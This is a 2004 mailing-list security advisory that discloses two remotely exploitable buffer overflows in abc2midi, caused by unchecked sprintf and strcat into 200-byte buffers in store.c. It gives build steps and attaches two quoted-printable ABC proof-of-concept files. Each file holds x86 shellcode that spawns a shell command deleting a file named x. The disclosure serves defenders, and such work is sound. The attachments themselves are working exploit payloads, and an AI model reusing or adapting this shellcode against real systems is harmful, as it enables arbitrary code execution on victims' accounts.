[remote] [control] abc2midi 2004.12.04 event_text overflows msg buffer; event_specific overflows msg buffer

"D. J. Bernstein" <[email protected]> 15 Dec 2004 08:24:00 -0000
Newsgroups gmane.comp.security.software
Message-ID <[email protected]>
--17pEHd4RhPHOinZp
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Limin Wang, a student in my Fall 2004 UNIX Security Holes course, has
discovered two remotely exploitable security holes in abc2midi. I'm
publishing this notice, but all the discovery credits should be assigned
to Wang.

You are at risk if you take an ABC file from an email message (or a web
page or any other source that could be controlled by an attacker) and
feed that file through abc2midi. Whoever provides the ABC file then has
complete control over your account: she can read and modify your files,
watch the programs you're running, etc.

The abc2midi documentation does not tell users to avoid taking input
from the network. Many web pages offer ABC files for public consumption.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   wget http://ifdo.pugmarks.com/%7Eseymour/runabc/abcMIDI-2004-12-04.zip
   unzip abcMIDI-2004-12-04.zip
   cd abcmidi
   gmake -f makefiles/unix.mak

to download and compile the abcmidi package, version 2004.12.04
(current). Then save the file 38-1.abc attached to this message, and
type

   ./abc2midi 38-1.abc

with the unauthorized result that a file named x is removed from the
current directory. The file 38-2.abc has the same effect but uses a
separate buffer overflow. (I tested these with a 426-byte environment,
as reported by printenv | wc -c; both files are sensitive to the
environment size.)

Here are the bugs: In store.c, event_text() has an unprotected sprintf
%s into a 200-byte buffer, and event_specific() has an unprotected
strcat() into a 200-byte buffer.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--17pEHd4RhPHOinZp
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="38-1.abc"
Content-Transfer-Encoding: quoted-printable

X: 1
LW: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EBGY=89=CA=83=C2=18=89=111=C0=89A=04=
=83=C2=13=89Q=08=83=C2=08=89Q=0C=83=C2=03=89Q=10=89A=14=88A*=88A2=88A5=88A:=
Q=83=C1=08Q=83=C1 =83=C1=03Q=83=C0;P=CD=801=C0P@P=CD=80=E8=B4=FF=FF=FFabcde=
fghijklmnopqrstuvwxPATH=3D/bin:/usr/bin /bin/sh -c rm x.NOPQRSTUVWXYZABCx=
=FA=BF=BFx=FA=BF=BFx=FA=BF=BFABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRST=
UVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZAB

--17pEHd4RhPHOinZp
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="38-2.abc"
Content-Transfer-Encoding: quoted-printable

%%0ndent 1.5cmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EBGY=89=CA=83=C2=18=89=111=
=C0=89A=04=83=C2=13=89Q=08=83=C2=08=89Q=0C=83=C2=03=89Q=10=89A=14=88A*=88A2=
=88A5=88A:Q=83=C1=08Q=83=C1 =83=C1=03Q=83=C0;P=CD=801=C0P@P=CD=80=E8=B4=FF=
=FF=FFabcdefghijklmnopqrstuvwxPATH=3D/bin:/usr/bin /bin/sh -c rm x.NOPQRSTU=
VWXYZABCDEFGHI=08=FA=BF=BF=08=FA=BF=BF=08=FA=BF=BF

--17pEHd4RhPHOinZp--